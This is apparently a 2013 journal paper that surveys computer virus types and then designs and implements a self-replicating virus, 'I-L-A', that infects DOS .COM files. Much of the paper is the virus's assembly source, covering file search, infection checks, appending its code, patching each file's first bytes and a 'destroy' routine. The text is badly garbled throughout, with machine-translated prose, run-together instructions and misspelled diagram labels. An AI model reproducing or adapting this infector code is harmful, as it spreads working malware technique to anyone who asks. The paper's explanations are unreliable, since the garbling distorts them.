How the Virus Work in the Process

(1)

International Journal of Emerging Technology and Advanced Engineering

Website: www.ijetae.com (ISSN 2250-2459,ISO 9001:2008 Certified Journal, Volume 3, Issue 6, June 2013)

70

Figure (1) shows the code to write the virus in the beginning of the file

Executable file Viruscode

Figure (2) shows the virus code writing over the original file data

Executable file

Virus code

decryption Virus code runs and jumps to

the beginning

Jumps to the end of file

jump instruction

How the Virus Work in the Process

Dr. Ali Mohammed Ramadan

Misurata University – Misurata Libya, Science Faculty

Abstract— In this project, it is designed to give a general idea of computer viruses, as well as been in the project design simple virus, and its practical implementation where this virus attack files with extension (COM), has been the adoption of the language of "the assembly (Assembly)" in the programming of the virus. Where was the name of this virus (I-L-A). Finally, care of project of the conclusions reached after the study, which is listed on the light of recommendations that can be used in future for those who would like to see this study or to add some improvements to this virus.

Keywords— Designed viruses, system controls, virus infection, Infect Procedure, Antidetection Procedure.

I. INTRODUCTION

The use of the system files (SYS) and reference files (Overlay) or libraries (Library) with the operational programs are sources of virus. The majority of viruses to perform her job status code self-reproducing either the beginning of the file as it is shown in Figure (1), or its end without a change in the components of the original file because the change in the original file to write metadata leads to corruption or destruction of the original program as shown in the Figure ( 2), and thus the virus will not be able to achieve his goal, when the infected program runs, the virus runs and reproduce and replicate itself to infect other files. Virus cod runs first then the virus code over winters the executable and renders it useless virus code.

Viruscode Executable file

Was attached to the virus itself by the end of the file and mark certain at the beginning of the file, and when you run the program, the start tag you move the control to the virus program to run instead of running the original program and then return control to the original program, and this is what has been beginning illustrated in Figure (3).

Figure (3) explains how to write a virus in the end of the file

Designed viruses for the purpose of causing the same with a certain type of executable files since it for each type of executable files structure (structure) is different from the other, Valverosat designed to attack executable files that type (COM) cannot attack the files (EXE) and vice versa, and both viruses ( COM) and viruses (EXE) can not attack your system files (SYS). Although it can be designed to attack the virus is capable of two or more types of files, in which case it needs to be different for each method of reproduction of these files.

II. SECTOR VIRUSES,MOBILIZATION (BOOT SECTOR

VIRUS)

[image:1.612.317.558.189.294.2] [image:1.612.52.252.524.614.2]

(2)

International Journal of Emerging Technology and Advanced Engineering

71

III. MACRO VIRUSES (MACRO VIRUS)

Is a virus that spreads quickly when exchanging disks and through the mail and free software, since it affects data files for the programs of the Office (Office program) or Help (Windows), or attached to the same applications or other files, and adopt the idea of the work of macro viruses for applications that contain programming languages embedded within them to help used in the completion of repetitive processes create mini-programs (macro), for example, language (Visual BASIC Script) in the Office applications (Office application), and when you open any document infected with this type of virus is active and it copies itself into other documents.

IV. TECHNIQUES USED BY VIRUSES TO PREVENT THE

DISCOVERY

Each previous types, which reported in this study of viruses that use one of the following techniques to hide its presence and make detection difficult job somewhat:

1. Deception (Stealth): using viruses effective ways to camouflage to hide its presence as an example when trying to read the information in the startup disk infected (brain) and the virus is active in memory will be offered information sector, the original, not the patient, as well as virus (Frodo), which infects files but can not be detected if it is active because it goes to the abolition of infection of the file you want to read it.

V. THE COMPONENTS OF ACOMPUTER VIRUS PROGRAM

Any computer virus proliferation and is subject to applicable must consist of at least two major parts (actions) can even be called the name of the virus, and these procedures are:

• Conduct research: should contain the virus to perform a search (Search procedure), and this procedure identifies sites that will copy the virus also specifies how to back (quickly or slowly).

• back: should contain the virus to make copies (Copy Procedure), to copy the virus in areas identified by the research, and whenever this procedure a small whenever the performance of the virus better. Where by these procedures achieve the objectives of the virus.

• can be added to the virus protection and a hide (Antidetection Procedure) so as not to enable the user

or anti-virus programs from discovery.

Actions constitute the previous three necessary components for the work of the virus, may contain or consist of some viruses of other measures intended to disrupt or sabotage the work of the computer or display messages or other actions by the virus to its implementation, which is not considered necessary or essential, but may be detrimental to the virus itself because it attracts the attention of the user.

VI. TYPES OF EXECUTABLE FILES (COM)

Is a small file size with a maximum size (capacity section one where) 64 KB, and uses the same section to store the instructions the program and its data, as well as the uses of the stack (Stack), that is, in this case, the values registered four (section program (CS), the data section ( DS), the stack segment (SS), and the additional section

(ES)) equal any point to the same sector.

When a request to perform a program of the type (COM) based operating system first checks the memory capacity available free to see whether enough to download the software to it, if the capacity is sufficient based operating system to book space in memory and puts a pointer to that space so that does not book the same area of the program another when you try to execute another program, then the program is loaded to the area by typing the prefix section of the program first (PSP) at the beginning of the region which, starting from the address (0H) to (100H), prefix the section "is a method inherited operating system (CP \ M) of the ancient book the first 256 bytes of memory to save some basic information for the operating system "[2], as it contains the address (5) in the prefix section of the program instruction jumped to the upper memory area, where there are the rest of the operating system components to enable the program to access the functions of the operating system and the content by calling the Title (5) of memory.

What that section is created prefix program until the operating system to download file (COM) is stored on the disk to the site that follows the prefix of the program, and once this is done so that the operating system to hand over control to the program, prior to this system is (DOS) has set up some Recorders and CPU values specified in advance, as it should be prepared well and Recorders sector but will not run operational programs of the type (COM).

VII. OVERVIEW OF THE VIRUS TO BE CREATED

(3)

International Journal of Emerging Technology and Advanced Engineering

72

The idea of the virus designer

Transmitted the virus to target devices through the file (COM) infected files to infect (COM) the other without destroying the target file.

How the virus (I-L-A)

The virus can reside in a file (COM) and the injury of the rest of the files must first be able to receive control in the course of implementation of the program at a certain point. And the most appropriate point for receipt of control is when the operating system to transfer control to the program itself, ie, the moment immediately preceding the beginning of the implementation of the infected program.

Based on that the virus must occupy the first bytes of a file (COM) and replace them napping by requiring the first instruction from his instructions at the end of the infected file, then the virus could have been the implementation of the instructions and return control to the original program.

The following is a summary of the steps of the virus: 1.When you download a program file (COM) infected

with the virus and its implementation and control of the virus to the CPU directly.

2.The search for other files to her.

3.Reads the first bytes of the file to be his to make sure that this file has not been previously infected. 4. The virus copies itself into the file that is being attacked, and writes at the beginning of this file to the first branch instruction is an instruction from the virus in the Help file.

4.The first copy of bytes that have been replaced by napping by branching to the end of the file, and refer to the instructions of the original program and its implementation.

VIII. PERFORM THE SEARCH FOR AFILE (FIND_FILE

PROCEDURE)

Virus to be able to search for files, designed to attack it must know the way in which the operating system to register information and files, as the operating system keeps track of any file stored on disk in two ways: First: The directory or index (Directory).

As it contains directory records (Record) length of 32 bytes each, and describes the log file and a directory of files, and this description contains the name and extension, size, date and time of file creation in addition to the file attributes (Attributs).

The second area of the file allocation table (FAT)

File allocation table is the index describes areas of the disk and determines from these busy areas and free for use. Operating system controls the process of access to the files for the purpose of reading or writing is the site to find the desired file and open it using the interrupt services (SPI). And county (21H) is a program of service user and only need to set the appropriate values in the processor and recorders that represent the program parameters and then we apply the appropriate district, as in the following

example:

mov dx, offset ffname mov ah, 4EH

int 21H

Where the software will search for the file matches the name of the file in (ffname), it is for that you interrupt (21H) to transfer control to the system (DOS) for doing his job, which contains the recorded (ah) number that identifies the operating system how to search, and have registered the other values provide for the operating system for more information on the required, as the programmers system (DOS) They developed a pair of research procedures in the province (21H) and two procedural research first) (4EH and procedural next search (4FH), two of the functions (DOS) complex as that needed by the summoned to the user put a special series of letters (ASCII) zero (ASCIIZ) in memory of the signal to the desired file to search for, and this series is composed of a set of bytes ending last byte

contains a value empty (null), such as:

ffname db '*. com', 0

After you customize a series of letters to the memory location should contain the registrar (ds: dx) address of this site, and must contain (cx) determine the value of the properties of the file you want to search for, and then is

called the search function first (4EH).

(4)

International Journal of Emerging Technology and Advanced Engineering

73

Filepresent

Prinsibilly of infecis the file End virus

Procedure ofprescdsity of file infectrs

Research about anther

infces file Print the name of infected file

Start of virus Research about first file

call Procedure of copy

Scheme (1) Work illustrates the action of the virus (I-L-A)

IX. CHECK OUT THE FILE (FILE_OK PROCEDURE)

After obtaining the name of the file you want to attack us, specifies the procedure for copying instructions to the virus or not, and this procedure is important in the success or failure of the virus and come in useful:

1.Do not allow the virus to infect a file do not have room to contain the virus instructions so as not to damage the file without the virus to achieve his goal to spread.

2.This procedure determines if the file is hit by the virus or not.

3.Avoid injury error file is write-protected.

Is in this procedure to open the file pattern of reading and writing through the development of value (2) in the registered (al) (al = 2), if the field properties of the file specifies that the file is read-only result from opening the file error and sets the operating system value (1) in the banner of pregnancy ((CF), Carry Flag) and thereby avoid virus infection of these files.

If you successfully open the file index restore the operating system for the file in the Registrar (ax) (a number used by the system to gain access to the file) and sets the value zero in (CF) and be instructed to open the file as follows:

mov dx, offset Fname

mov ax, 3d02h int 21h

Once the file is opened so that the virus reads the bytes the first of the file and put it in a location in memory (registered dx refers to the address of this site), using the function of the (DOS) (3FH), which requires the development of the number of bytes to be read in the registered (cx) and contain recorded (bx) index of the file that the operating system returned when the file is opened and the instructions are read from the file are as follows: mov bx, ax

mov cx, 6

mov dx, offset buf mov ah, 3Fh int 21h

Are then put the size of the file in the field (Fsize) in registered (ax) and in addition to the size of the virus, which is determined by subtracting the address of the first instruction in the virus (Begin) from the title of another instruction (Final) and add (100H) is the area that Ihdzha the system to prefix program (PSP) when implemented so that if there is flood in recorded (ax), it means that the file is too large and does not accommodate to contain instructions virus infection successful then puts the operating system (1) in (CF), and thus re-examination reference for Search could not be infected this file and search for another file and placing (0) in the banner of zero (Zero Flag, (ZF)) as follows:

mov al, 1 or al, al ret

In the event that the file size appropriate for the injury, it must make sure that this file has not been injured by comparing the bytes of the first file with the letters (I-L-A) If you do not file contains these characters followed by napping (call) the file is intact and the examination gave a positive signal for Search for a file by hitting the set (1) in the zero flag (ZF) as follows:

xor al, al

RET

(5)

International Journal of Emerging Technology and Advanced Engineering

74

X. BACK (INFECT PROCEDURE)

Uses a virus this procedure to copy the instructions to the file that has been identified by the research, and is in this procedure to open the file pattern of reading, writing and using the function (3DH) where we set the file name in the registered (dx) and a (2) in the registered (al) and call the interrupt (21H), where the province returns a pointer to the file in (ax) and saved this pointer in the memory address (Handle), then we are then going to the end of the file you want to copy the instructions the virus to him by the function (42H) by placing recorded in the file pointer (bx) and the development of appropriate value in the registered (al), where the cursor is shifted to the beginning of the file depending on the value of the registered (al) as follows:

- If your registered (al) on the value zero (al = 0) this means placing the cursor at the beginning of the file.

- As if it contains registered (al) on the value (2) (al = 2) This means the cursor is positioned at the end of the file. And go the end of the file are as follows:

xor cx, cx mov dx, cx

mov bx, word ptr [handle] mov ax, 4202h

int 21h

After that is going to the end of the file we specify the number of bytes to be copied from the virus to the file to be infected and put it in the registered (cx) and a memory address to be copies of it in the registered (dx) and an index file to copy to in the registered (bx), and then function status (40H) recorded in (ah), and this is copied instructions in the virus-like end of the file are the following:

mov cx, es mov ds, cx

mov cx, offset Final - offset begin mov dx, offset Vir_Start

mov bx, ax mov ah, 40h int 21h

Is going back to the end of the file in order to write the bytes that were read in the examination (the first bytes of the file).

In the last stage to pollute the file is currently no virus 6 bytes in the beginning of the file containing the letters (I-L-A) and instruction (call), in addition to the title of the first instruction of the virus in the infected file, then close the file using the function (3EH) as in the following steps: mov bx, word ptr [handle]

mov ah, 3Eh int 21h

Count that the virus is the implementation of the previous procedures (search for a file and check the file and copy) performs the action (destroy), and should the virus to return control to the original program to retrieve the data exchange (DTA) to its original condition with the shift (80H) as in the following steps:

mov dx, 80h mov ah, 1Ah int 21h model small .stack 100h .code Begin: ORG 100h

***********copy the virus to the zore of primory stor in

the memory **********

mov ax,@data mov ds,ax

] mov di,offset [Vir_Start push ds

mov ax,@code mov ds,ax mov si,100h

mov [V_size],offset Final - offset begin mov cx,word ptr [V_size]

(6)

International Journal of Emerging Technology and Advanced Engineering

75 pop ds

call V_begin

**************** procedure of dislracton of the virus **************

: destroy

mov dx,offset display1 mov ah,9

int 21h mov ah,8 int 21h cmp al,2EH jne destroy mov ah,8 int 21h

cmp al,2EH jne destroy jmp final

******************** Star of virus *******************

V_begin:

mov ah,1Ah mov dx,offset DTA int 21h : start

call Find_File

****************re control aqoin in infected proqram*************

Exit:

mov dx,80h mov ah,1Ah int 21h

ret ; return after call V_begin

******************* procedure research about first file *****************

Find_File:

mov dx,offset FFname mov cx,3Fh

mov ah,4Eh int 21h FF_Loop:

or al,al

jnz return ;no file found call File_Ok

jnz go_on ;file can't infect call Infect

mov word ptr[Fname+12],'$' mov dx,offset Fname mov ah,9

int 21h go_on:

mov ah,4Fh ;search for next file int 21h

jmp FF_Loop

return: ret

******************* procedure of scan the file *****

************** File_Ok:

(7)

International Journal of Emerging Technology and Advanced Engineering

76 mov cx,6

mov dx,offset buf mov ah,3Fh int 21h

mov ax,word ptr [Fsize] add ax,[V_size]+100h jc not_ok

' cmp word ptr [buf],'LI je not_ok

cmp byte ptr [buf+3],0E8H je not_ok

xor al,al ;can infect file ret

not_ok:

mov al,1 ;can't infected or al,al

ret

******************procedure copy of virus******************

Infect:

mov dx,offset Fname

mov ax,3d02h ;open file for r\w int 21h

push ax

mov word ptr [handle],ax xor cx,cx

mov dx,cx

mov bx,word ptr [handle]

mov ax,4202h ; go to the end of file int 21h

mov word ptr[ii],ax

pop ax push ds mov cx,es mov ds,cx

mov cx,offset Final - offset begin

;number bit that you want to write it

mov dx,offset Vir_Start mov bx,ax

mov ah,40h ;write them to file int 21h

pop ds xor cx,cx mov dx,cx

mov bx,word ptr [handle]

mov ax,4202h ; go to the end of file

int 21h

mov byte ptr [buf+5],0C3H mov cx,6

mov bx,word ptr [handle] mov dx,offset buf mov ah,40h int 21h xor cx,cx mov dx,cx

mov bx,word ptr [handle] mov ax,4200h

int 21h

(8)

International Journal of Emerging Technology and Advanced Engineering

77 mov byte ptr[buf+3],0E8h

mov ax,word ptr[ii] sub ax,3

mov word ptr[buf+4],ax

;write the(ILA Call)in the begin of the file mov cx,6

mov dx,offset buf mov bx,word ptr [handle] mov ah,40h

int 21h

mov bx,word ptr [handle] mov ah,3Eh

int 21h ret

********************** virus end ******************

Final:

***************** exit from virus *******************

mov ah,4ch int 21h

****************** data rare of virus **************

.data

DTA db 1Ah dup(?) Fsize dw 0,0 Fname db 13 dup(?) buf db 5 dup(?) FFname db '*.com' handle dw 0 V_size dw(?) Vir_Start dw 0 ii dw 0

display1 db 'Ibtesaam Laila Afrah','$' end begin

REFERENCES

[1] Kip R. Irvine, ASSEMBLY LANGUAGE The IBM-PC, 2nd edition.

[2] Mark A. Ludwig, The Little Black Book of Computer Viruses, Volume 1: The Basic Technology, Fourth printing, 1995, American Eagle Publications, Inc.

[3] Mark A. Ludwig, Computer Viruses, Artificial Life and Evolution (The Little Black Book of Computer Viruses), Volume 2, 1993, American Eagle Publications, Inc.

[4] Peter Szor, The Art of Computer Virus Research and Defense, First Printing, February 2005, Symantec Corporation, USA.

[5] Yngve Ness, Norman Book on Computer Viruses, Norman ASA, February, 2003

(9)

International Journal of Emerging Technology and Advanced Engineering

78

Colled the size of the file with the size of virus progam

ه

End

procedure

They are no prinsiblity of file infected

Start of pracedure

Open file for reading and write

no

prinsibilty of the file write

yes

read the first 6 bits firstin the file and store it

no is it the qood size

yes

no is it the first 3 bits is ILA

Yes

yes

No

Prensibilty of file infectas

(scheme2) Work illustrates the procedure file_ok

(10)

International Journal of Emerging Technology and Advanced Engineering

79

Scheme (3)Work illustrates the procedure Infect

Go to end of file And copy instruction virus in

Go anthe time virus in For the end of file And write the end reading 6 bits and from to bits The end

Go to slorl of file And write ILA

Close the file

End file Open file for read And write